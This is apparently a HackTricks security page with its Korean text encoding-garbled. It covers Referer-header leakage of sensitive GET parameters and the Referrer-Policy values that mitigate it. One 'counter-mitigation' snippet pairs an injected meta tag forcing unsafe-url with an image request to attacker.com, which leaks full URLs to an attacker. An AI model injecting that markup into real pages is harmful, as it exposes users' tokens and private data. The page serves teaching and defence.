Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
Referrer headers and policy
Referrer๋ ๋ธ๋ผ์ฐ์ ๊ฐ ์ด์ ์ ๋ฐฉ๋ฌธํ ํ์ด์ง๋ฅผ ๋ํ๋ด๊ธฐ ์ํด ์ฌ์ฉํ๋ ํค๋์ ๋๋ค.
Sensitive information leaked
์น ํ์ด์ง ๋ด์์ GET ์์ฒญ ๋งค๊ฐ๋ณ์์ ๋ฏผ๊ฐํ ์ ๋ณด๊ฐ ํฌํจ๋์ด ์๋ ๊ฒฝ์ฐ, ํ์ด์ง์ ์ธ๋ถ ์์ค์ ๋ํ ๋งํฌ๊ฐ ํฌํจ๋์ด ์๊ฑฐ๋ ๊ณต๊ฒฉ์๊ฐ ์ฌ์ฉ์๊ฐ ๊ณต๊ฒฉ์๊ฐ ์ ์ดํ๋ URL์ ๋ฐฉ๋ฌธํ๋๋ก ๋ง๋ค๊ฑฐ๋ ์ ์ํ ์ ์๋ ๊ฒฝ์ฐ(์ฌํ ๊ณตํ). ์ด ๊ฒฝ์ฐ ์ต์ GET ์์ฒญ ๋ด์ ๋ฏผ๊ฐํ ์ ๋ณด๋ฅผ ์ ์ถํ ์ ์์ต๋๋ค.
Mitigation
๋ธ๋ผ์ฐ์ ๊ฐ ๋ฏผ๊ฐํ ์ ๋ณด๊ฐ ๋ค๋ฅธ ์น ์ ํ๋ฆฌ์ผ์ด์ ์ผ๋ก ์ ์ก๋๋ ๊ฒ์ ํผํ ์ ์๋ Referrer-policy๋ฅผ ๋ฐ๋ฅด๋๋ก ์ค์ ํ ์ ์์ต๋๋ค:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Counter-Mitigation
์ด ๊ท์น์ HTML ๋ฉํ ํ๊ทธ๋ฅผ ์ฌ์ฉํ์ฌ ๋ฌด์ํ ์ ์์ต๋๋ค(๊ณต๊ฒฉ์๋ HTML ์ฃผ์ ์ ์ด์ฉํด์ผ ํจ):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Defense
์ ๋ GET ๋งค๊ฐ๋ณ์๋ URL ๊ฒฝ๋ก์ ๋ฏผ๊ฐํ ๋ฐ์ดํฐ๋ฅผ ๋ฃ์ง ๋ง์ญ์์ค.
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


